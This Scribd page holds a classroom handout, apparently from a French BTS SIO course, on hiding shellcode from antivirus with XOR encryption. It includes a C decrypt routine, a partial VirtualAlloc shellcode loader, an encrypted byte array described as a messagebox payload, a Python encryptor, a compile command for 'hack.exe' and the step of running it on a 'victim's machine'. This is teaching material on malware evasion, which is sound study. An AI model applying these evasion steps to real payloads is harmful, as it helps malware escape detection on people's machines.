0% found this document useful (0 votes)
13 views4 pages

04 Evasion Encryption

The document discusses methods for encrypting payloads in malware to evade antivirus detection, specifically using XOR encryption. It includes code snippets for the encryption and decryption process, as well as a Python script to automate the encryption of payload data. The final steps involve compiling the malware and executing it on a target machine.

Uploaded by

sta.akpa
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
13 views4 pages

04 Evasion Encryption

The document discusses methods for encrypting payloads in malware to evade antivirus detection, specifically using XOR encryption. It includes code snippets for the encryption and decryption process, as well as a Python script to automate the encryption of payload data. The final steps involve compiling the malware and executing it on a target machine.

Uploaded by

sta.akpa
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 4

04 - evasion: payload encryption

Let's say we have a simple shellcode runner malware.

Let's go to bypass AV static analysis.

For this first we must encrypt our payload. Why we want to encrypt our payload? The basic purpose of
doing this to hide you payload from someone like AV engine or reverse engineer. So that reverse
engineer cannot easily identify your payload.

The purpose of encryption is the transform data in order to keep it secret from others. For simplicity,
we use XOR encryption for our case.

Let’s take a look at how to use XOR to encrypt and decrypt our payload.

Add XOR function:

char secretKey[] = "secret";

// encryption / decryption XOR function


void deXOR(char *buffer, size_t bufferLength, char *key, size_t
keyLength) {
int keyIndex = 0;
for (int i = 0; i < bufferLength; i++) {
if (keyIndex == keyLength - 1) keyIndex = 0;
buffer[i] = buffer[i] ^ key[keyIndex];
keyIndex++;
}
}

Then update our simple malware code:


PROFESSEUR : M.DA ROS BTS SIO BORDEAUX - LYCÉE GUSTAVE EIFFEL
✦1/4✦

//....
// decrypt payload
deXOR((char*)payload, sizeof(payload), secretKey, sizeof(secretKey));

// allocate memory buffer for payload


payload_mem = VirtualAlloc(0, sizeof(payload), MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE);

// etc...

And the other difference is our payload:


// payload: messagebox (XOR encrypted)
unsigned char payload[] = { 0x3b, 0xe6, 0x8f, 0x5a, 0x2d, 0xf7, 0x97,
0x95, 0x2b, 0xff, 0x70, 0x12, 0x73, 0x65, 0x63, 0x3a, 0xe8, 0x79, 0x21,
0x65, 0x63, 0x72, 0x8d, 0xea, 0x73, 0x65, 0x63, 0x3e, 0xee, 0x8c, 0x3b,
0xe8, 0x6e, 0x2f, 0x65, 0x74, 0x73, 0x9a, 0xb3, 0x3a, 0xe8, 0x61, 0x2c,
0x65, 0x63, 0x72, 0x2d, 0xf9, 0x7e, 0x28, 0x63, 0x72, 0x65, 0x9c, 0xc,
0x65, 0x63, 0x72, 0x28, 0x47, 0xba, 0x29, 0xee, 0x77, 0x4, 0x74, 0x73,
0x65, 0x2b, 0xff, 0x70, 0x3a, 0x73, 0x65, 0x63, 0x3a, 0x56, 0xbd, 0x8c,
0xb5, 0x2b, 0xff, 0x70, 0x22, 0x73, 0x65, 0x63, 0x3a, 0xe8, 0x79, 0x79,
0x65, 0x63, 0x72, 0x8d, 0x22, 0x73, 0x65, 0x63, 0x3a, 0x56, 0xbd, 0x8c,
0xb5, 0x28, 0x37, 0x37, 0x3a, 0x36, 0x29, 0x50, 0x40, 0x4b, 0x30, 0x3f,
0x29, 0x63, 0x3e, 0xa, 0x15, 0x17, 0x29, 0xa, 0x10, 0x17, 0x15, 0x1,
0x1c, 0x22, 0x72, 0x30, 0x27, 0x36, 0x37, 0x50, 0x40, 0x4b, 0x30, 0x3f,
0x29, 0x63, 0x3f, 0x0, 0x7, 0x0, 0x4, 0x4, 0x17, 0x27, 0x1b, 0xb, 0x24,
0x63, 0x3a, 0x0, 0x18, 0x1f, 0xa, 0x43, 0x5, 0xa, 0x6, 0x1f, 0x1, 0x63,
0x3f, 0x0, 0x7, 0x0, 0x4, 0x4, 0x17, 0x65, 0x31, 0xb, 0xc, 0x17, 0x22,
0x17, 0x1b, 0x10, 0x0, 0x10, 0x1, 0x65, 0x3c, 0xf0, 0x89, 0x4b, 0x17,
0x29, 0xff, 0x77, 0x40, 0x3, 0x72, 0x65, 0x74, 0x3e, 0xee, 0x23, 0x6a,
0x28, 0xf9, 0x13, 0x75, 0x2e, 0xf9, 0x61, 0x50, 0x8f, 0x2c, 0xe8, 0xa,
0x5, 0x3c, 0xf8, 0x94, 0xcf, 0xf6, 0xa5, 0x0, 0x55, 0xef, 0x44, 0xf2,
0x99, 0x15, 0xf, 0x66, 0xe3, 0x9e, 0x45, 0x4e, 0x93, 0x10, 0x6b, 0x3a,
0x9a, 0xb3, 0x3b, 0x9a, 0xa4, 0x99, 0x80, 0x39, 0xf8, 0x65, 0x2e, 0x49,
0xa1, 0x1, 0xa5, 0x2d, 0x50, 0xb2, 0x8c, 0xd3, 0x73, 0x65, 0x63, 0x3b,
0xee, 0x2c, 0x43, 0x21, 0xe8, 0x39, 0x59, 0x38, 0x70, 0xae, 0x2a, 0xf3,
0xa4, 0xfc, 0x73, 0x65, 0x63, 0x37, 0xee, 0x5d, 0x3e, 0xe0, 0x8e, 0x7,
0x6d, 0x3c, 0x40, 0xa5, 0x8a, 0xf7, 0x65, 0x74, 0x73, 0x2b, 0xee, 0x76,
0x4e, 0x31, 0xf8, 0x14, 0x67, 0x3f, 0x66, 0x81, 0x32, 0xee, 0x2b, 0x6a,
0x20, 0xff, 0x23, 0x45, 0x2f, 0x71, 0xb6, 0x8b, 0xba, 0x28, 0xee, 0x7e,
0xef, 0x35, 0xf8, 0x5c, 0x2b, 0x71, 0x9e, 0x3c, 0xf8, 0x97, 0xc5, 0x7,
0x6d, 0xfe, 0x75, 0xe1, 0xa3, 0x6, 0x6c, 0x9f, 0x86, 0x87, 0x85, 0x3a,
0x56, 0xb4, 0x98, 0x2b, 0x26, 0xf9, 0x2d, 0x50, 0x3f, 0x66, 0xa8, 0x14,
0x24, 0xff, 0x7f, 0x2c, 0x26, 0xf9, 0x2d, 0x68, 0x3f, 0x66, 0xa8, 0x33,
0xee, 0x70, 0xfa, 0x2c, 0x58, 0xb7, 0x19, 0x5b, 0x3a, 0x5e, 0xa5, 0x1,
0x4f, 0x3c, 0xfe, 0x51, 0x7b, 0x3a, 0xe8, 0x8, 0x57, 0x55, 0x2f, 0xf9,
0x82, 0xd0, 0xf3, 0x5b, 0x4d, 0x7, 0x9f, 0xd0, 0xb4, 0x62, 0x27, 0x3e,
0x29,
PROFESSEUR : M.DA ROS 0x74, 0x3a, 0xee,
✦ 2 / 4 ✦ 0xaf, 0x33, 0x9a, 0xa3, 0x3a, 0xee, 0xaf, 0x3a,
BTS SIO BORDEAUX - LYCÉE GUSTAVE EIFFEL

0xee, 0xa2, 0x9a, 0x71, 0x9c, 0x8d, 0x9a, 0x3c, 0x70, 0xa6, 0x2b, 0xf1,
0xa1, 0x5c, 0xb0 };

which encrypted with XOR

For that create simple python script which encrypt payload and replace it in our C++ template:

import sys
import os
import hashlib
import string

## XOR function to encrypt data


def xor(data, key):
key = str(key)
l = len(key)
output_str = ""

for i in range(len(data)):
current = data[i]
current_key = key[i % len(key)]
ordd = lambda x: x if isinstance(x, int) else ord(x)
output_str += chr(ordd(current) ^ ord(current_key))
return output_str

## encrypting
def xor_encrypt(data, key):
ciphertext = xor(data, key)
ciphertext = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in
ciphertext) + ' };'
print (ciphertext)
return ciphertext, key

## key for encrypt/decrypt


my_secret_key = "secret"

plaintext = open("./hello.bin", "rb").read()


ciphertext, p_key = xor_encrypt(plaintext, my_secret_key)

Run python script:

python3 xor.py

PROFESSEUR : M.DA ROS BTS SIO BORDEAUX - LYCÉE GUSTAVE EIFFEL


✦3/4✦

Compile malware:
x86_64-w64-mingw32-g++ -O2 hack.c -o hack.exe -I/usr/share/mingw-
w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -
fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -
fpermissive

Then run it on our victim's machine:

.\hack.exe

PROFESSEUR : M.DA ROS BTS SIO BORDEAUX - LYCÉE GUSTAVE EIFFEL


✦4/4✦

You might also like